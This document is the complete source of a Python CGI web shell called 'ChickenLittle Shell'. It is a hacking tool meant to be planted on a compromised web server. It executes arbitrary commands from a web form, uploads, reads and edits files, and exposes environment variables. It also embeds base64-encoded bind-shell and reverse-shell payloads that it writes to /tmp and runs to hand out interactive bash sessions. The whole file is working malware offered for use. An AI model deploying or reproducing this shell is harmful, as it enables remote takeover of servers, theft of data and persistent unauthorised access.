#!/usr/bin/python
"""
ChickenLittle Shell by Zep
"""
try:
import cgitb; cgitb.enable()
except:
pass
import sys, cgi, os, base64, subprocess
from time import strftime
from string import Template
bind_port = """aW1wb3J0IG9zLCBzeXMsIHNvY2tldCwgdGltZQpQT1JUID0gaW50KHN5cy5hcmd2WzFdKQpQVyA9
IHN5cy5hcmd2WzJdCnNvY2sgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5T
T0NLX1NUUkVBTSkKc29jay5iaW5kKCgiMC4wLjAuMCIsUE9SVCkpCnNvY2subGlzdGVuKDUpClNI
RUxMPSIvYmluL2Jhc2ggLWkiCndoaWxlIFRydWU6CiAgICB0cnk6CQogICAgICAgIChjb25uLGFk
ZHIpID0gc29jay5hY2NlcHQoKQogICAgICAgIG9zLmR1cDIoY29ubi5maWxlbm8oKSwwKQogICAg
ICAgIG9zLmR1cDIoY29ubi5maWxlbm8oKSwxKQogICAgICAgIG9zLmR1cDIoY29ubi5maWxlbm8o
KSwyKQogICAgICAgIHByaW50ID4+IHN5cy5zdGRlcnIsICdQYXNzd29yZDogJywKICAgICAgICBw
ID0gY29ubi5yZWN2KDEwMjQpCiAgICAgICAgcCA9IHAuc3RyaXAoKQogICAgICAgIGlmIHAgPT0g
UFc6CiAgICAgICAgICAgIG9zLnN5c3RlbSgiL2Jpbi9iYXNoIC1pIikKICAgICAgICBlbHNlOgog
ICAgICAgICAgICBwcmludCA+PiBzeXMuc3RkZXJyLCAiR28gdG8gaGVsbCIKICAgICAgICBjb25u
LmNsb3NlKCkKICAgIGV4Y2VwdCBFeGNlcHRpb24sZTogIAogICAgICAgIHByaW50IGUKICAgICAg
ICB0aW1lLnNsZWVwKDEpCg=="""
back_connect = """aW1wb3J0IHNvY2tldCwgb3MsIHN5cwpIT1NUID0gc3lzLmFyZ3ZbMV0KUE9SVCA9IGludChzeXMu
YXJndlsyXSkKU0hFTEwgPSAiL2Jpbi9iYXNoIC1pIgpzb2NrID0gc29ja2V0LnNvY2tldChzb2Nr
ZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnNvY2suY29ubmVjdCgoSE9TVCxQT1JUKSkK
dHJ5OgogICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgb3MuZHVwMihzb2NrLmZpbGVu
bygpLCAxKQogICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAyKQogICAgb3Muc3lzdGVtKFNIRUxM
KQpleGNlcHQgRXhjZXB0aW9uLGU6CiAgICBwcmludCBlCnNvY2suY2xvc2UoKQo="""
# HTML
html = Template("""
ChickenLittle Shell <title>ChickenLittle Shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<style>
body {
color:#fff;
background-color:#585858;
font-size:11px;
}
table {
font-family: Verdana, Tahoma;
font-size:11px;
}
tr {
border: #D9D9D9 1px solid;
}
td {
border: #D9D9D9 1px solid;
}
a {
color: #fff;
}
input {
background-color:#800000;
color:#FFFFFF;
font-family:Tahoma;
font-size:8pt;
}
select {
background-color:#800000;
color:#FFFFFF;
font-family:Tahoma;
font-size:8pt;
}
textarea {
background-color:#800000;
color:#FFFFFF;
font-family:Tahoma;
font-size:8pt;
}
</style>
<script type="text/javascript">
function toggleEnviron()
{
if (document.getElementById('environ_table').style.display=="none")
document.getElementById('environ_table').style.display="";
else
document.getElementById('environ_table').style.display="none";
}
</script>
=== ChickenLittle Shell ===
<a href="javascript:void(0)" onclick="javascript:toggleEnviron()">Show/Hide Environment variables</a>
$environ_table
<p />
<table width="100%">
uname -a: $uname <br />
$uid
|
<p />
<div style="display:$edit_file_box_visibility">
Edit File: <br />
<p />
</div>
<table width="100%">
<td style="text-align:center">
:: Change Dir ::<br />
<td style="text-align:center">
:: Get File ::<br />
<p />
<table width="100%">
<td colspan="2" style="text-align:center">$cur_dir
|
<pre>$list_files</pre> |
<p />
Result of command<br />
<table width="100%">
<textarea cols="200" rows="10">$command_result</textarea>
|
<table width="100%">
<td style="text-align:center" width="50%">
:: Execute Command ::<br />
<td style="text-align:center">
:: Useful Commands ::<br />
<p />
<table width="100%">
<td style="text-align:center" width="50%">
:: Create Dir ::<br />
<td style="text-align:center">
:: Upload File ::<br />
<p />
<table width="100%">
<td style="text-align:center" width="50%">
:: Search Text in Files ::<br />
<td style="text-align:center;vertical-align:top">
:: Edit File ::<br />
<p />
<table width="100%">
<td style="text-align:center" width="50%">
:: Bind port to /bin/bash ::<br />
<td style="text-align:center" width="50%">
:: back-connect ::<br />
<p />
<table width="100%">
<td style="text-align:center">(.)(.) [ChickenLittle Shell by Zep] (.)(.)
|
""")
scriptname = ""
if os.environ.has_key("SCRIPT_NAME"):
scriptname = os.environ["SCRIPT_NAME"]
def get_environ_table():
s = "<table style=\"display:none\" id=\"environ_table\">"
for k in os.environ:
s+="| %s | %s |
"%(k,os.environ[k])
s+=""
return s
def run_command(command):
p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
(i,o) = p.stdin,p.stdout
return o.read()
def get_param(form, param,default=None):
if form.has_key(param):
return form.getvalue(param)
return default
def can_write(file_name):
try:
f = open(file_name,"w")
f.close()
return True
except:
return False
def put_script(base_name,encoded_script):
script = base64.b64decode(encoded_script)
i = 0
file_name = "/tmp/"+base_name + str(i)
while not can_write(file_name):
i+=1
file_name = "/tmp/"+base_name + str(i)
f = open(file_name,"w")
f.write(script)
f.close()
return file_name
def main():
print "Content-type: text/html" # header
print # blank line
form = cgi.FieldStorage()
uname = run_command("uname -a")
uid = run_command("id")
cur_dir = get_param(form, "cur_dir",os.getcwd())
if not os.path.exists(cur_dir):
cur_dir = os.getcwd()
os.chdir(cur_dir)
command = get_param(form,"command")
command_result = ""
file_content = ""
file_name = ""
edit_file_box_visibility = "None"
if command == "mkdir":
new_dir = get_param(form,"new_dir")
command_result = run_command("mkdir " + new_dir)
elif command == "upload":
upload_file = form["file"]
try:
f = open(upload_file.filename,"w")
while True:
chunk = upload_file.file.read(1024)
if not chunk: break
f.write(chunk)
f.close()
except Exception,e:
command_result = str(e)
elif command == "search_text":
search_text = get_param(form,"search_text","")
search_dir = get_param(form,"search_dir",".")
include_pattern = get_param(form,"include_pattern")
exclude_pattern = get_param(form,"exclude_pattern")
cmd = "grep -ir \"%s\" %s " % (search_text,search_dir)
if include_pattern:
cmd += "--include=%s " % include_pattern
if exclude_pattern:
cmd += "--include=%s " % exclude_pattern
command_result = run_command(cmd)
elif command == "edit_file":
file_name = get_param(form,"file_name")
try:
f = open(file_name,"r")
file_content = f.read()
f.close()
edit_file_box_visibility = ""
except:
command_result = "Cannot open file"
file_content = ""
edit_file_box_visibility = "None"
elif command == "save_file":
file_name = get_param(form,"file_name")
file_content = get_param(form,"file_content")
try:
f = open(file_name,"w")
f.write(file_content)
f.close()
command_result = "Successful"
except:
command_result = "Cannot write to file"
elif command == "bind_port":
port = get_param(form,"port")
password = get_param(form,"password")
file_name = put_script("bp",bind_port)
pid = subprocess.Popen(["python %s %s %s" % (file_name,port,password)],shell=True).pid
command_result = "Process ID : %d " % pid
elif command == "back_connect":
port = get_param(form,"port")
ip = get_param(form,"ip")
file_name = put_script("bc",back_connect)
pid = subprocess.Popen(["python %s %s %s" % (file_name,ip,port)],shell=True).pid
command_result = "Process ID : %d " % pid
elif command != None:
command_result = run_command(command)
list_files = run_command("ls -alh " + cur_dir)
print html.substitute(environ_table=get_environ_table(),
uname = uname,
uid = uid,
list_files = list_files,
cur_dir = cur_dir,
command_result = command_result,
file_content = file_content,
file_name = file_name,
edit_file_box_visibility = edit_file_box_visibility
)
if __name__ == '__main__':
main()